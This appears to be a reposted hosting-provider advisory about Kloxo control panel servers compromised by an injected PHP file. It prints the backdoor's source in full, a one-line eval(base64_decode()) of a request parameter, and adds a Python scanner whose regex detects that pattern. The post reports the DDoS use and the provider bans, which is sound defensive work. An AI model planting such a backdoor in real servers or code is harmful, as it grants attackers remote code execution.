Kloxo Control Panel is a free hosting control panel used by a great many people. Recently, however, multiple reports indicate that Kloxo has a very serious security vulnerability.
We had been considering dropping the Kloxo “Host In A Box” template anyway, since it hasn’t been updated for 2+ years, but now the final nail has been driven into the coffin.
Our clients are getting their Kloxo installations compromised with a randomly-named PHP file placed into ./home/kloxo/httpd/default/, which is the ‘default’ site accessible by IP address.
UPDATE: default.php in the same directory will also be compromised. See source here: http://disclosed.info/?9b00e7fa79636e07#rZKQYHUkErNv0ZFArSkUyBQ8C8YLSVaSsaRVo9nfypc=
This PHP file contains (also at http://disclosed.info/?7c12a1a4560b7664#5fpnfdknf4EfBcGqLjeV9/vAY1RXEKkLC3+fqm16c6E=):
<?php
set_time_limit(0);error_reporting(NULL);
if(($_REQUEST["8ba7afbaaddc67de33a3f"])!=NULL)eval(base64_decode($_REQUEST["8ba7afbaaddc67de33a3f"]));
else echo "<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title></title></head><body>Access denied.</body ></html >";
?>

Where the $_REQUEST variable is a random value. The basic premise of the script is: if the specific $_REQUEST variable is set, then decode and run all of the code passed via variable. This is obviously bad.

All of the requests to run the script successfully have, thus far, come from: 176.31.146.168 (France, OVH Systems, OVH Systems, AS16276 OVH Systems, doesn’t have rDNS)

Currently, these are being used to send extremely wimpy (20-40k pps, see http://d.pr/i/BXlo ) DDOS; the script used seems to be poorly written, as it slams CPU usage before it gets anywhere near maximum network utilization. We’ve had 4 instances this morning, and it’s affected Ramnode, if not others. Beware!

Source: https://vpsboard.com/topic/3384-kloxo-installations-compromised/
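A defender-side sweep for the backdoor shape quoted above, as an added example that is not part of the original post or of Kloxo's code. It looks for `eval(base64_decode($_REQUEST[...]))` in `.php` files under a directory and reports the request key; matching other superglobals and spacing variants goes beyond what the post reports and is an assumption, and the function names and sample files are constructed for illustration.

```python
import re
import sys
import tempfile
from pathlib import Path

# Shape of the backdoor quoted above: eval(base64_decode($_REQUEST["<key>"])).
# Allowing other superglobals, either quote style and extra whitespace is an
# assumption added here, not something the post reports seeing.
BACKDOOR_RE = re.compile(
    rb"eval\s*\(\s*base64_decode\s*\(\s*\$_(?:REQUEST|POST|GET|COOKIE)"
    rb"\s*\[\s*[\"']([^\"']+)[\"']\s*\]\s*\)\s*\)",
    re.IGNORECASE,
)

def scan_php_backdoors(root):
    """Return [(relative path, request key)] for .php files under root that match."""
    base = Path(root)
    hits = []
    for path in sorted(base.rglob("*.php")):
        try:
            match = BACKDOOR_RE.search(path.read_bytes())
        except OSError:
            continue  # unreadable file: skip it rather than abort the sweep
        if match:
            hits.append((str(path.relative_to(base)), match.group(1).decode("ascii", "replace")))
    return hits

def constructed_demo():
    """Scan a throwaway tree holding constructed samples (no real host data)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        # Constructed: same structure as the quoted file, placeholder key.
        (root / "xqzvbn.php").write_text(
            '<?php\nif(($_REQUEST["0123456789abcdef01234"])!=NULL)'
            'eval(base64_decode($_REQUEST["0123456789abcdef01234"]));\n?>'
        )
        # Constructed: variant spacing and quoting inside a modified default.php.
        (root / "default.php").write_text(
            "<?php echo 'hi'; eval( base64_decode( $_POST['k1'] ) ); ?>"
        )
        # Constructed: benign page that decodes a constant and never evals input.
        (root / "index.php").write_text('<?php echo base64_decode("aGVsbG8="); ?>')
        return scan_php_backdoors(root)

if __name__ == "__main__":
    # No argument: run the constructed demo. Otherwise scan the given directory,
    # e.g. /home/kloxo/httpd/default/ as named in the post.
    found = scan_php_backdoors(sys.argv[1]) if len(sys.argv) > 1 else constructed_demo()
    for path, key in found:
        print(f"{path}: eval(base64_decode()) on request key {key!r}")
```

A clean result only means this one pattern is absent; the second update from Ramnode below still calls for wiping the installation.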
Ramnode, for its part, believes that Kloxo is the cause of the CPU overload on its OpenVZ systems.
Update 2: Kloxo users - http://www.webhostingtalk.com/showthread.php?t=1344003 . We are having to shutdown/suspend your VPSs due to the massive CPU load spikes and network traffic the exploit is generating. You can also read more here: https://vpsboard.com/topic/3384-kloxo-installations-compromised/
Update 3: Due to the severity of the exploit and high potential for further exploits, we have added Kloxo to our prohibited uses in the AUP. You will need to wipe your installation and use a different panel going forward.
Many VPS and server providers, such as Ramnode and INIZ, have now banned Kloxo on their systems. Ramnode recommends that users switch to VestaCP, another free hosting control panel, as a replacement.
Source: Kloxo CP has a serious security vulnerability; many providers have banned it